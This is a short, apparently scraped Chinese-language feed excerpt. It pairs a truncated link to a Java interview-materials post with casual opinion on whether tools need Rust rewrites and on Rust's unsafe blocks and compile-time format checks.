作者:HollisChuang 链接:https://juejin.im/post/5f0283956fb9a07eb90cac4c马上又到秋招了,给大家准备了一点面试资料,祝福大家都能找到心仪的工作~Java学习文档、学习笔记、面试题库、实战书籍获取方式 fastjs…
duangsuse::Echo
https://t.me/hyi0618/5036?comment=6393 #algorithm #visualize >poetry pip 用 #Rust rewrite #statement 这种类似 docker/chroot 的东西其实C API调用都很少,最复杂的部分反而可能是 CLI getopt 和配置文件模板,根本不需要rust.. rust 的意义就是让我们觉得很Niubility,很neo,但写出来的东西,其实不比拿zsh或py胶水几个包快。 printf "\e[33m黄字"…
我突然觉得,如果 #IT 界都是温高铁这种拿粗鲁当聪明的「小天才」, Rust 还挺可爱的。
至少它不会放那些
至少它不会放那些
x=(void*)(int*)n 的人进 unsafe{} ,也不会把 println!("%s%s") 的检查放进运行期